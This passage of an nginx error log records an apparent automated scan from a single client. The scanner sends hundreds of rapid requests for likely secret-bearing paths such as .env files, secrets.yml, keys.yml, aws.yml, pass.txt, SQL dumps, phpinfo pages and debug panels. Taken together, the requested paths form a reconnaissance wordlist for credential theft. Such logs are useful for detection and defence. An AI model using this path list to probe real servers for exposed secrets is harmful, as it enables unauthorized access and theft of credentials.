web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/main.ba0c34b7.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /build/routes/index-[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cache.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cardea/backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cdw-backend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cgi-bin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cgi-bin/pass.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch2-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch6-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch6a-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch7-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch7a-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch8-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch8a-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ch8b-mytodo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /Chai/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /challenge/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /challenges/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /charts/liveObjects/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /chat-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:16 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /chiminey/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /chunk-B2FODB4I.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ci/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /client-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /client/mutual-fund-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /client/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /clld_dir/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cloud/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cmd/testdata/expected/dot_env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /code/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /code/web/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /CodeGolf.Web/ClientApp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /codenames-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /collab-connect-web-application/server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /collected_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /community/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/aws.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/cache.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/default.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/keys.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/production.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/secrets.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/settings.py HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /ContainerRegistry/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /containers/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:17 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /content/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /control/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/Datavase/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/persistence/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /core/src/main/resources/org/jobrunr/dashboard/frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /counterblockd/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /counterwallet/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cronlab/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cryo_project/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /css/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /custom/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /d/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dashboard/i.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dashboard/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dashboard/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dashboard/test.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /data/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /database/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dataset1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dataset2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /db-admin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /db.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug/default/view.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:18 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /default/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /delivery/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /demo-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /demo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dep.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /deploy.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /deploy/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /deployment-config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev-env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev/.env.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev_env/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /developer.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /developer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /developerslv/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /development/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /devs.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /devtools HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /directories/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dist/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dist/js/app.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /django-blog/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /django/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /django_project_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /doc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-compose.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-compose/platform/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-elk/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-network-healthcheck/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker-node-mongo-redis/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/compose/withMongo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/compose/withPostgres/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:19 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/database/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/db/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/dev/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/examples/compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/postgres/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docker/webdav/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /docs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dodoswap-client/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dotfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /download/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /downloads/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /drupal/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /e2e/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /en/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /engine/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.template HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env/dockers/mariadb-test/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env/dockers/php-apache/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:20 [error] 292#292: *17221 web-terminal could not be resolved (2: Server failure), 